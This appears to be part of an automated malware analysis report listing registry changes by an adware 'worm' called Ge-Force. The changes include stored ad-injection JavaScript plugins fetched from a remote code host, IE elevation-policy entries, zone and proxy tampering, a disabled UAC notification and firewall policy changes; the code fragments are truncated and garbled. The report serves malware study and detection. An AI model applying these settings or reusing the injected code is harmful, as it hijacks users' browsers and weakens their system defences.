    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
    "Policy" = "3"

    [HKCU\Software\Ge-Force\Plugins\253]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\2]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\39]
    "Name" = "IEDatabase"

    [HKLM\SOFTWARE\Crossrider]
    "Bic" = "589912D45CE0412C9CDE01D4C96E2298IE"

    [HKCU\Software\Ge-Force\Plugins\1]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/1.js"

    [HKCU\Software\Ge-Force\Plugins\4]
    "URL" = "http://js.newstatsclientcloud.com/plugins/javascripts/jquery-1_7_1_min.js"

    [HKCU\Software\Ge-Force\Plugins\9]
    "Name" = "search_engine_hook"

    [HKCU\Software\Ge-Force\Plugins\195]
    "Version" = "28"

    [HKCU\Software\Ge-Force\Plugins\46]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/46.js"

    [HKCU\Software\Ge-Force\Manifest]
    "homepageurl" = "NA"

    [HKCU\Software\Ge-Force\Plugins\356]
    "Version" = "1"

    [HKCU\Software\Ge-Force\Plugins\14]
    "Version" = "11"

    [HKCU\Software\Ge-Force\Plugins\301]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/301.js"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
    "AppName" = "Ge-Force-codedownloader.exe"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
    "AppPath" = "%Program Files%\Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\104]
    "Name" = "jollywallet_m"

    [HKCU\Software\Ge-Force\Plugins\200]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/200.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
    "DisplayName" = "Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\22]
    "JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}elR"

    [HKCU\Software\Ge-Force\Plugins\37]
    "Version" = "6"

    [HKCU\Software\Ge-Force\Manifest]
    "UpdateInterval" = "360"

    [HKCU\Software\Ge-Force\Plugins\43]
    "Version" = "5"

    [HKCU\Software\Ge-Force\Installer]
    "osName" = "XP32"

    [HKCU\Software\Ge-Force\Plugins\223]
    "Version" = "9"

    [HKCU\Software\Ge-Force\Plugins\177]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\36]
    "Version" = "8"

    [HKCU\Software\Ge-Force\Manifest]
    "PublisherName" = "iWebar"

    [HKCU\Software\Ge-Force\Plugins\183]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\35]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k

    [HKCU\Software\Ge-Force\Plugins\263]
    "Version" = "3"

    [HKCU\Software\Ge-Force\Plugins\14]
    "JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-聓"

    [HKCU\Software\Ge-Force\Plugins\94]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/94.js"

    [HKCU\Software\Ge-Force\Installer]
    "subid" = "0"

    [HKCU\Software\Ge-Force\Plugins\183]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functi"

    [HKCU\Software\Ge-Force\Plugins\253]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/253.js"

    [HKCU\Software\Ge-Force\Plugins\221]
    "Name" = "icm_downloads_m"

    [HKCU\Software\Ge-Force\Manifest]
    "IsButtonEnabled" = "false"

    [HKCU\Software\Ge-Force\Plugins\337]
    "URL" = "http://js.newstatsdemosrv.com/plugins/mins/337.js"

    [HKCU\Software\Ge-Force\Plugins\288]
    "Version" = "1"

    [HKCU\Software\Ge-Force\Plugins\21]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/21.js"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
    "Installed" = "1"

    [HKCU\Software\Ge-Force\Plugins\41]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

    [HKCU\Software\Ge-Force\Plugins]
    "AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,345,354,253,93,102,104,123,180,184,192,220,195,200,221,223,242,263,273,281,286,301,177,91,28"

    [HKCU\Software\Ge-Force\Plugins\7]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\246]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/246.js"

    [HKCU\Software\Ge-Force\Plugins\47]
    "Version" = "3"

    [HKCU\Software\Ge-Force\Plugins\221]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/221.js"

    [HKCU\Software\Ge-Force\Plugins\3]
    "Name" = "ie8_fix_2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKCU\Software\Ge-Force\Plugins\93]
    "Version" = "14"

    [HKCU\Software\Ge-Force\Plugins\182]
    "Name" = "openUrl"

    [HKCU\Software\Ge-Force\Plugins\17]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\263]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/263.js"

    [HKCU\Software\Ge-Force\Plugins\28]
    "JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

    [HKCU\Software\Ge-Force\Plugins\182]
    "Version" = "3"

    [HKCU\Software\Ge-Force\Plugins\28]
    "Name" = "initializer"

    [HKCU\Software\Ge-Force\Manifest]
    "Name" = "Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\177]
    "JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p

    [HKCU\Software\Ge-Force\Plugins\38]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/38.js"

    [HKCU\Software\Ge-Force\Plugins\94]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\46]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn@"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
    "AppPath" = "%Program Files%\Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\1]
    "Version" = "11"

    [HKLM\SOFTWARE\Crossrider]
    "Verifier" = "7d6635bb3acc762051a59407230a02ec"

    [HKCU\Software\Ge-Force\Plugins\42]
    "JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;)"

    [HKCU\Software\Ge-Force\Plugins\44]
    "Version" = "6"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Ge-Force\Plugins\242]
    "Name" = "price_gong_m"

    [HKLM\System\CurrentControlSet\Control\Session Manager]
    "PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\,"

    [HKCU\Software\Ge-Force\Manifest]
    "AddressbarURL" = "NA"

    [HKCU\Software\Ge-Force\Plugins\78]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/78.js"

    [HKCU\Software\Ge-Force\Plugins\17]
    "JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.seǐ"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\Ge-Force\Plugins\183]
    "Name" = "tabsWrapper"

    [HKCU\Software\Ge-Force\Installer]
    "FullVersionForUrl" = "1_35_12_18"

    [HKCU\Software\Ge-Force\Plugins\223]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'ywpwzqylqz'); }"

    [HKCU\Software\Ge-Force\Plugins\200]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\64]
    "Name" = "appApiMessage"

    [HKCU\Software\Ge-Force\Plugins\4]
    "Version" = "5"

    [HKCU\Software\Ge-Force\Manifest]
    "Manifest" = "NA"

    [HKCU\Software\Ge-Force\Update]
    "LastCheck" = "1421039414"

    [HKCU\Software\Ge-Force\Plugins\123]
    "Name" = "intext_adv_m"

    [HKLM\SOFTWARE\Ge-Force\IE]
    "TotalProfiles" = "1"

    [HKCU\Software\InstalledBrowserExtensions\21836\Status]
    "Installed" = "1"

    [HKCU\Software\Ge-Force\Plugins\182]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/182.js"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "EF 1E DD DC A6 3D CB 28 91 69 85 29 DA 0B A4 28"

    [HKCU\Software\Ge-Force\Plugins\37]
    "Name" = "IEBrowserEvents"

    [HKCU\Software\Ge-Force\Plugins\1]
    "Name" = "base"

    [HKCU\Software\Ge-Force\Plugins\102]
    "Version" = "11"

    [HKCU\Software\Ge-Force\Plugins\45]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===nÉ»"

    [HKCU\Software\Ge-Force\Plugins\91]
    "JavaScript" = "(function(M){var A=[].slice;var z={};var a=function(ar){if(typeof ar==string&&typeof ar.trim==function){return ar.trim();}return ar==null?:ar.toString().replace(/^\s /,).replace(/\s $/,);};function f(ar){var at=z[ar]={},au,av;ar=ar.split(/\s /);for(au=0,av=ar.length;au

    [HKCU\Software\Ge-Force\Plugins\102]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/102.js"

    [HKCU\Software\Ge-Force\Plugins\221]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Installer]
    "CodeDownloadDomain" = "http://js.newstatsclientcloud.com"

    [HKCU\Software\Ge-Force\Code]
    "BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

    [HKCU\Software\Ge-Force\Manifest]
    "Description" = "Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\262]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\7]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/7.js"

    [HKCU\Software\Ge-Force\Plugins\45]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\13]
    "Name" = "CrossriderAppUtils"

    [HKCU\Software\Ge-Force\Plugins\64]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/64.js"

    [HKCU\Software\Ge-Force\Plugins\22]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/22.js"

    [HKCU\Software\Ge-Force\Plugins\123]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'vwfblxmddx'); }"

    [HKCU\Software\Ge-Force\Plugins\40]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi)"

    [HKCU\Software\Ge-Force\Plugins\253]
    "Name" = "pixel_inject"

    [HKCU\Software\Ge-Force\Plugins\46]
    "Name" = "IETimers"

    [HKCU\Software\Ge-Force\Plugins\354]
    "Name" = "categories"

    [HKCU\Software\Ge-Force\Plugins\220]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/220.js"

    [HKCU\Software\Ge-Force\Plugins\345]
    "Name" = "pluginsVerticals"

    [HKCU\Software\Ge-Force\Plugins\91]
    "Name" = "monetizationLoader.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
    "Publisher" = "iWebar"

    [HKCU\Software\Ge-Force\Plugins\9]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/9.js"

    [HKCU\Software\Ge-Force\Plugins\2]
    "Name" = "ie8_fix_1"
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/2.js"

    [HKCU\Software\Ge-Force\Plugins\38]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO"

    [HKCU\Software\Ge-Force\Plugins\42]
    "Version" = "10"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

    [HKCU\Software\Ge-Force\Plugins\350]
    "Version" = "1"

    [HKCU\Software\Ge-Force\Plugins\47]
    "JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f""

    [HKCU\Software\Ge-Force\Plugins\220]
    "Name" = "icm_base_m"

    [HKCU\Software\Ge-Force\Plugins\242]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/242.js"

    [HKCU\Software\Ge-Force\Plugins\14]
    "Name" = "CrossriderUtils"

    [HKCU\Software\Ge-Force\Plugins\123]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/123.js"

    [HKCU\Software\Ge-Force\Plugins\184]
    "Version" = "10"

    [HKCU\Software\Ge-Force\Plugins\4]
    "Name" = "jquery_1_7_1"

    [HKCU\Software\Ge-Force\Plugins\195]
    "Name" = "icm_convertmedia_m"

    [HKCU\Software\Ge-Force\Plugins\102]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'ymqrbrldpj'); }"

    [HKCU\Software\Ge-Force\Manifest]
    "SetNewTab" = "false"

    [HKCU\Software\Ge-Force\Plugins\64]
    "JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){e"

    [HKCU\Software\Ge-Force\Manifest]
    "ThanksUrl" = "NA"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
    "AppPath" = "%Program Files%\Ge-Force"

    The Worm modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "ProxyBypass" = "1"

    The Worm modifies IE settings for security zones to map all URLs to the Intranet Zone:

    "IntranetName" = "1"

    The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Worm deletes the following registry key(s):

    [HKCU\Software\Ge-Force\Plugins\301]
    [HKCU\Software\Ge-Force\Plugins\263]
    [HKCU\Software\Ge-Force\Plugins\242]
    [HKCU\Software\Ge-Force\Plugins\184]
    [HKCU\Software\Ge-Force\Plugins\183]
    [HKCU\Software\Ge-Force\Plugins\182]
    [HKCU\Software\Ge-Force\Plugins\246]
    [HKCU\Software\Ge-Force\Plugins\180]
    [HKCU\Software\Ge-Force\Plugins\104]
    [HKCU\Software\Ge-Force\Plugins\2]
    [HKCU\Software\Ge-Force\Plugins\223]
    [HKCU\Software\Ge-Force\Plugins\220]
    [HKCU\Software\Ge-Force\Plugins\207]
    [HKCU\Software\Ge-Force\Plugins\200]
    [HKCU\Software\Ge-Force\Plugins\93]
    [HKCU\Software\Ge-Force\Plugins\91]
    [HKCU\Software\Ge-Force\Plugins\94]
    [HKCU\Software\Ge-Force\Plugins\221]
    [HKCU\Software\Ge-Force\Plugins\177]
    [HKCU\Software\Ge-Force\Plugins\345]
    [HKCU\Software\Ge-Force\Plugins\72]
    [HKCU\Software\Ge-Force\Plugins\17]
    [HKCU\Software\Ge-Force\Plugins\14]
    [HKCU\Software\Ge-Force\Plugins\38]
    [HKCU\Software\Ge-Force\Plugins\13]
    [HKCU\Software\Ge-Force\Plugins\78]
    [HKCU\Software\Ge-Force\Plugins\35]
    [HKCU\Software\Ge-Force\Plugins\36]
    [HKCU\Software\Ge-Force\Plugins\37]
    [HKCU\Software\Ge-Force\Plugins\43]
    [HKCU\Software\Ge-Force\Plugins\39]
    [HKCU\Software\Ge-Force\Plugins\64]
    [HKCU\Software\Ge-Force\Plugins\273]
    [HKCU\Software\Ge-Force\Plugins\41]
    [HKCU\Software\Ge-Force\Plugins\40]
    [HKCU\Software\Ge-Force\Plugins\192]
    [HKCU\Software\Ge-Force\Plugins\42]
    [HKCU\Software\Ge-Force\Plugins\253]
    [HKCU\Software\Ge-Force\Plugins\195]
    [HKCU\Software\Ge-Force\Plugins\47]
    [HKCU\Software\Ge-Force\Plugins\44]
    [HKCU\Software\Ge-Force\Plugins]
    [HKCU\Software\Ge-Force\Plugins\46]
    [HKCU\Software\Ge-Force\Plugins\354]
    [HKLM\SOFTWARE\Tempo]
    [HKCU\Software\Ge-Force\Plugins\286]
    [HKCU\Software\Ge-Force\Plugins\281]
    [HKCU\Software\Ge-Force\Plugins\4]
    [HKCU\Software\Ge-Force\Plugins\7]
    [HKCU\Software\Ge-Force\Plugins\9]
    [HKCU\Software\Ge-Force\Plugins\1]
    [HKCU\Software\Ge-Force\Plugins\123]
    [HKCU\Software\Ge-Force\Plugins\3]
    [HKCU\Software\Ge-Force\Plugins\28]
    [HKCU\Software\Ge-Force\Plugins\22]
    [HKCU\Software\Ge-Force\Plugins\21]
    [HKCU\Software\Ge-Force\Plugins\45]
    [HKCU\Software\Ge-Force\Plugins\102]

    The Worm deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process %original file name%.exe:1616 makes changes in the system registry.
    The Worm creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Security Center]
    "UacDisableNotify" = "1"

    [HKCU\Software\Aas]
    "a1_0" = "2892445252"

    [HKCU\Software\Aas\695404737]
    "35845605" = "476"

    [HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "DoNotAllowExceptions" = "0"

